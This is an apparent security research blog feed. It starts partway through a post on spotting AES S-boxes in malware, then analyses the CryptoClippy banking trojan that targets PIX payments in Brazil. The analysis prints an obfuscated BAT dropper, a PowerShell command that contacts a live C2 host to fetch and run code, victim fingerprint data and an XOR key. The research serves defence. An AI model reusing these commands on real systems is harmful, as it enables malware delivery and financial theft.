&lt;a href="#aes" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;An &lt;a href="https://en.wikipedia.org/wiki/Rijndael_S-box"target="_blank" rel="noopener"&gt;S-box&lt;/a&gt;, short for
Substitution box, is a fundamental component in many symmetric encryption
algorithms and block ciphers. It is used to perform non-linear substitution of
bits or bytes, introducing confusion in the data and enhancing the
cryptographic strength of the algorithm. Confusion ensures that the
relationship between the plaintext and ciphertext is complex and obscure,
making it resistant to various cryptographic attacks, such as differential and
linear cryptanalysis.&lt;/p&gt;
&lt;p&gt;In an S-box, each input value (a bit or a byte) is substituted with a
corresponding output value based on a predefined substitution table or
mathematical function. This substitution table ensures that the relationship
between the input and output values is highly non-linear and non-reversible,
making it challenging for attackers to deduce the original data or the key used
in the encryption.&lt;/p&gt;
&lt;p&gt;S-boxes are widely used in popular encryption algorithms like AES (Advanced
Encryption Standard), where they are applied during the substitution layer of
the encryption process. In AES, the S-box substitutes each byte of the input
state with a corresponding byte from the S-box, which is fixed and defined by
the AES standard.&lt;/p&gt;
&lt;p&gt;AES has known boxes that anyone, including malware developers, can use. For
example, the implementation of AES in GoLang defines the following s-box:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;var sbox0 = [256]byte{
0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16,
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;a href="https://github.com/golang/go/blob/8a1ff5182780af72d08c3e6b91694425a1498014/src/crypto/aes/const.go#L48"target="_blank" rel="noopener"&gt;Source&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Researchers can make YARA rules to detect these known S-boxes to identify the
use of AES.&lt;/p&gt;
&lt;p&gt;Researchers can create YARA rules to identify the use of AES by detecting known
S-boxes used in the algorithm. By analyzing the binary representation of the
encrypted data or examining memory dumps, researchers can search for byte
arrays that match the predefined S-box patterns. This can be a valuable
technique for identifying the presence of AES encryption in malware or other
cryptographic applications.&lt;/p&gt;
&lt;h3&gt;Debugging&lt;span class="hx:absolute hx:-mt-20" id="debugging"&gt;&lt;/span&gt;
&lt;a href="#debugging" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Encryption and decryption routines in malware can be highly intricate, and some
may even have a proprietary implementation, adding to the complexity. As a
result, analyzing these routines can be a tedious and time-consuming process.
In such cases, it is preferable to debug the malware sample within an isolated
environment. Doing so can provide valuable insights into the data manipulation
that occurs during encryption and decryption. By debugging the
encryption/decryption routines, security analysts can uncover the interesting
payload more efficiently, which is particularly crucial during time-sensitive
situations like incident response.&lt;/p&gt;
&lt;h2&gt;Conclusions&lt;span class="hx:absolute hx:-mt-20" id="conclusions"&gt;&lt;/span&gt;
&lt;a href="#conclusions" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Encryption plays a significant role in both our daily lives and the tactics of
malware developers. As a result, understanding the fundamental concepts of
encryption, distinguishing between symmetric and asymmetric encryption, and
being acquainted with common encryption algorithms are essential skills.
Identifying crucial elements of these algorithms in malware samples can greatly
aid researchers in recognizing the use of encryption in threats. This insight
can lead to a deeper understanding of other capabilities and components of the
threat, facilitating more effective analysis and response strategies.&lt;/p&gt;</description></item><item><title>CryptoClippy is Evolving to Pilfer Even More Financial Data</title><link>https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/</link><pubDate>Wed, 24 May 2023 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/</guid><description>
&lt;p&gt;A banking trojan is a malware designed to steal sensitive financial
information, such as online banking login credentials, credit card numbers, and
other financial data. Recently Unit42 released a detailed
&lt;a href="https://unit42.paloaltonetworks.com/crypto-clipper-targets-portuguese-speakers/"target="_blank" rel="noopener"&gt;report&lt;/a&gt;
about a new malware called CryptoClippy that targets Portuguese speakers. The
pesky malware uses the information from the clipboard to redirect money to
crypto-wallets controlled by the threat actors.&lt;/p&gt;
&lt;p&gt;In our research, we have uncovered evidence indicating that the CryptoClippy
threat is undergoing rapid evolution and exceeding its initial scope of crypto
wallet theft. Our findings indicate that the threat actors behind CryptoClippy
are actively expanding its capabilities, &lt;strong&gt;now targeting a broader range of
payment services commonly used in Brazil&lt;/strong&gt;. This discovery highlights the
alarming nature of this evolving malware, as it signifies a significant shift
in the tactics employed by the malicious actors. As they continue to refine and
enhance their methods, the potential risks increase for financial data security
in Brazil. Our investigation delves deep into these emerging patterns, shedding
light on the evolving landscape of CryptoClippy and the imminent risks it poses
to the payment ecosystem in Brazil.&lt;/p&gt;
&lt;p&gt;During our research, we found that the attackers also use &lt;strong&gt;NSIS installers&lt;/strong&gt;
to deploy the first stage of the attack. We were also able to acquire new
malware samples from C2. While there are many similarities between our findings
and those described in the reports, we could pick up unique strings and
functionalities that were not present in the previously reported samples. One
of the things that we noticed is that the &lt;strong&gt;threat targets services that are
specifically used in Brazil&lt;/strong&gt;. Starting from the icon of the installer in the
first stage that uses the logo of the postal service of Brazil. And then the
malware that looks for information associated with PIX – a payment service used
in Brazil.&lt;/p&gt;
&lt;p&gt;In this blog, we will provide a technical analysis of the artifacts we found.&lt;/p&gt;
&lt;h2&gt;Technical Analysis of CryptoClippy&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis-of-cryptoclippy"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis-of-cryptoclippy" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;We identified a suspicious
&lt;a href="https://analyze.intezer.com/files/19f0f8831ef9d561f6dc395eff55d165d614fa06d13a9a3d39b120ef18242f12"target="_blank" rel="noopener"&gt;.NET sample&lt;/a&gt;
that is signed by &amp;ldquo;PLK Management Limited,&amp;rdquo; and its metadata has the company
and product name pointing to &amp;ldquo;WhatsApp.&amp;rdquo; Still, it doesn’t share code with the
software.&lt;/p&gt;
&lt;p&gt;We named the installer of the first stage MINTYCIV.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig1.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig2.png" title=".NET MINTYCIV first stage installer." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;.NET MINTYCIV first stage installer.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The installer attempts to look like a legitimate application, but in the
background, it attempts to connect to a remote C2 server. It decodes the URL
using Base64, which resolves to &lt;code&gt;https://mydigitalrevival[.]com/get.php&lt;/code&gt; and
sends the string &amp;ldquo;&lt;code&gt;82DPRmbP&lt;/code&gt;&amp;rdquo;. This domain was mentioned in the Unit42 post.&lt;/p&gt;
&lt;p&gt;We found more files with the same signer however, unlike the first file, they
are NSIS installers, like
&lt;a href="https://analyze.intezer.com/analyses/97a2e3e1-44da-433e-8b20-a1d5f4200160/genetic-analysis"target="_blank" rel="noopener"&gt;this file&lt;/a&gt;.
Most of the files have an icon of Correios. This state-owned company operates
the national postal service of Brazil. The submitted file name starts with
Rastreio or Correios followed by four letters. Restreio translates to
&amp;ldquo;tracking&amp;rdquo; in Portuguese and Correios means &amp;ldquo;mail&amp;rdquo; or &amp;ldquo;post office.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig3.png" title="Correios logo included with the files" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Correios logo included with the files&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig4.png" title="One of the NSIS installers with the Correios logo" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;One of the NSIS installers with the Correios logo&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;All files have the same behavior – extract and execute a BAT file that attempts
to connect to a C2. The connection will work only if the request is sent from
Brazil. However, we overcame this check using a VPN, and thus, we got the
payload of the 2nd stage.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-batch" data-lang="batch"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;voc = &amp;#39;O2mGSBzKDaVURN6fQpAYxXhn3dqwPy5J7ukbCFoI1svi4tHrWjcZElgLT9M80e&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;print(&lt;span class="s2"&gt;&amp;#34;(&amp;#34;&lt;/span&gt;, voc[13],voc[61],voc[27],&amp;#39;-&amp;#39;,voc[0],voc[35],voc[49],voc[61],voc[50],voc[45], voc[13],voc[61],)
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;print(voc[45],&amp;#39;.&amp;#39;, voc[48],voc[61],voc[35],voc[36],voc[53],voc[43],voc[61],voc[23],voc[45],&amp;#39;).&amp;#39;,voc[11],)
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;print(voc[17],voc[53],voc[38],voc[9],voc[25],voc[4],voc[45],voc[47],voc[43],voc[23],voc[54],&amp;#39;(&lt;span class="s2"&gt;&amp;#34;&amp;#39;, voc[22])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;print(voc[45],voc[45],voc[17],&amp;#39;://&amp;#39;, voc[61],voc[15],voc[60],voc[22],&amp;#39;.&amp;#39;, voc[50],voc[38],voc[2])
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;print(&amp;#39;/&amp;#39;, voc[40],&amp;#39;/&lt;span class="s2"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;&amp;#39;, voc[15],voc[21],voc[53],voc[8],&amp;#39;&lt;span class="s2"&gt;&amp;#34;) |&amp;#39;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;print(&amp;#39;.($&amp;#39;,voc[61],voc[23],voc[42],&amp;#39;:&amp;#39;, voc[28],&amp;#39;-&amp;#39;)
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;print(voc[48],voc[43],voc[23],voc[25],voc[38],voc[27],voc[41],voc[28],voc[38],voc[27],voc[61],voc[47],)
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;print(voc[4],voc[22],voc[61],voc[53],voc[53],&amp;#39;\&amp;#39;, voc[42],voc[40],&amp;#39;.&amp;#39;,voc[60],&amp;#39;\&amp;#39;, voc[17],)
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;print(voc[38],voc[27],voc[61],voc[47],voc[41],voc[22],voc[61],voc[53],voc[53],)&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Above, the BAT script extracted from NSIS installer.&lt;/p&gt;
&lt;p&gt;After the deobfuscation of the script, one of the executed commands will upload
a string to a malicious remote server. If the connection is successful, the
remote server will send a PowerShell script that will be immediately executed.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$result&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Net&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;WebClient&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="py"&gt;UploadString&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;http://ef0h.com/1/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;fXlD&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;After executing the BAT file, if the connection is successful, the response is
another script that will be executed as set by the previously executed command.
This script collects information about the endpoint – computer name, the
operating system name, display name, architecture, and the name of the
antivirus software installed on the endpoint.&lt;/p&gt;
&lt;p&gt;Next, it makes a JSON structure in the following way:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The key ‘1’ has a unique identifier that changes between samples&lt;/li&gt;
&lt;li&gt;The key ‘2’ stores the value representing the architecture&lt;/li&gt;
&lt;li&gt;The key ‘10’ stores the base64 encoded string that holds the string with the
information collected in the previous step.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;}=&lt;/span&gt;&lt;span class="vm"&gt;@&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s1"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;3ptt9kcnrgslgt7gfjdojm2qu5&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s1"&gt;&amp;#39;2&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;64&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s1"&gt;&amp;#39;10&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;=[&lt;/span&gt;&lt;span class="no"&gt;Convert&lt;/span&gt;&lt;span class="p"&gt;]::&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;tObaSe64strING&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="no"&gt;Text.Encoding&lt;/span&gt;&lt;span class="p"&gt;]::&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;DEfAulT&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;.(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;GetBytes&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="py"&gt;Invoke&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;WINMACHINEmike;x64-based PC;Microsoft Windows 7 Ultimate;64-bit;Windows Defender&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The JSON is sent to the same domain used in the previous stage. At this stage
it is not clear which values are expected by the host. But if the checks are
passed, the server will send back a large JSON file processed by the current
script. The data seen above satisfies the checks on the server side, and we
obtained the payload for the 2nd stage of the attack.&lt;/p&gt;
&lt;p&gt;The response contains 5 parts: 3 scripts, a loader, and a configuration file –
as described by Unit 42. We noticed that in the first stage of the attack, a
directory was created in AppDataRoaming, and the directory’s name changed based
on the response from the C2. We spotted the names Reposita or Flexizen, which
is also the name of 3 of the scripts used in the first stage of the attack.&lt;/p&gt;
&lt;p&gt;One of the PowerShell scripts (Reposita.ps) decodes the loader of the 2nd stage
(the file named sc) and injects it into the currently executed process
(PowerShell). Similarly to the previous report, the payload is encoded with
XOR, but the key is shorter. After decoding the payload, we got a DLL file. The
XOR key used in this execution is 0x1a, 0x13, 0x37, 0xe8, 0xea, 0xb0, 0xb2,
0x94, 0x8b, 0x0b, 0x2d, 0xaa, 0x52, 0xe9, 0xeb, 0x25.&lt;/p&gt;
&lt;p&gt;Once we removed the obfuscations from the PowerShell script, we identified
strong similarities to an
&lt;a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1"target="_blank" rel="noopener"&gt;open-source project&lt;/a&gt;
implementing an injection method. It is possible that the CryptoClippy malware
developers cloned the project, removed the symbols and added a layer of
obfuscation, and deployed this script.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig5.png" title="The script that injects the 2nd loader (after removing the obfuscation from the script)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;The script that injects the 2nd loader (after removing the obfuscation from the script)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The 2nd stage
&lt;a href="https://analyze.intezer.com/files/894ad71e6fea9a5068512a7de5c2b176bc9556acf96284f131614d0e402059dc"target="_blank" rel="noopener"&gt;loader&lt;/a&gt;
is a 64-bit DLL with one exported function – main. The logic of the loader is
similar to the one
&lt;a href="https://analyze.intezer.com/files/89d7c8c7846068c4f618f80d18944f2fcf47cbebe7390d73c1f16ef0ed48d90b"target="_blank" rel="noopener"&gt;reported&lt;/a&gt;
by Unit 42, as it also appears to use
&lt;a href="https://github.com/jthuraisamy/SysWhispers2"target="_blank" rel="noopener"&gt;SysWhisper&lt;/a&gt;, an open-source
project that implements direct system calls execution for evading detection. In
addition, both loader versions use Ntdll to resolve API functions, and the API
names are hashed.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig6.png" title="Analysis of the CryptoClippy loader we inspected." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Analysis of the CryptoClippy loader we inspected.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The loader we found has two unique strings. One of them is
client-injector64.dll which seems to be the name of the DLL.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig7.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;We noticed that both loader versions, before making the injection, call
&lt;a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-rtlgetversion"target="_blank" rel="noopener"&gt;RtlGetVersion&lt;/a&gt;
to get information about the operation system of the victim endpoint. The
loader checks the
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-osversioninfoa"target="_blank" rel="noopener"&gt;OSVERSIONINFOEX.wProductType&lt;/a&gt;
of the victim machine. It will proceed only if the major version is 6 or 10 and
the correct minor version is defined in the
&lt;a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_osversioninfoexw"target="_blank" rel="noopener"&gt;documentation&lt;/a&gt;.
From this check, we understand that the malware targets Windows versions
starting from Vista and above.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig7.png" title="Source: https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-osversioninfoa" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Source: https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-osversioninfoa&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Updates to the CryptoClippy Malware&lt;span class="hx:absolute hx:-mt-20" id="updates-to-the-cryptoclippy-malware"&gt;&lt;/span&gt;
&lt;a href="#updates-to-the-cryptoclippy-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The payload of the loader from the previous stage is CryptoClippy malware and
the
&lt;a href="https://analyze.intezer.com/files/d2c85de7c763e8d8990d06f78f226fda36443253c63678c7c0e998499f3af61a"target="_blank" rel="noopener"&gt;sample&lt;/a&gt;
that we obtained
&lt;a href="https://intezer.com/blog/malware-analysis/defining-genetic-malware-analysis/"target="_blank" rel="noopener"&gt;shares most of its code with the samples&lt;/a&gt;
that were published in the previous report. While the main functionality of the
malware stayed the same, there are several changes that we noticed.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/05/cryptoclippy-evolves-to-pilfer-more-financial-data/images/fig9.png" title="Analysis of the CryptoClippy malware sample obtained from the C2." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Analysis of the CryptoClippy malware sample obtained from the C2.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Information Stealing&lt;span class="hx:absolute hx:-mt-20" id="information-stealing"&gt;&lt;/span&gt;
&lt;a href="#information-stealing" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;In the sample we analyzed, there are 3 functions for processing the clipboard’s
content. One of them is responsible for switching the address of crypto wallets
– as described in the Unit 42 post. One of the other functions takes the
clipboard’s content and sends it to the C2. And the third function checks if
the clipboard contains the string &amp;ldquo;&lt;code&gt;0014br.gov.bcb.pix&lt;/code&gt;&amp;rdquo;, as seen in the
screenshot below. If it’s found, the content is sent to the remote server. PIX
is an online payment platform created by the Central Bank of Brazil. It allows
users to make transactions using a QRcode or an equivalent code that contains
the strings: &amp;ldquo;0014br.gov.bcb.pix&amp;rdquo;. The recipient of the payments creates a
QRcode that must contain the following information: &amp;ldquo;PIX Key,&amp;rdquo; &amp;ldquo;Beneficiary
Name,&amp;rdquo; and &amp;ldquo;Beneficiary City.&amp;rdquo;&lt;/p&gt;
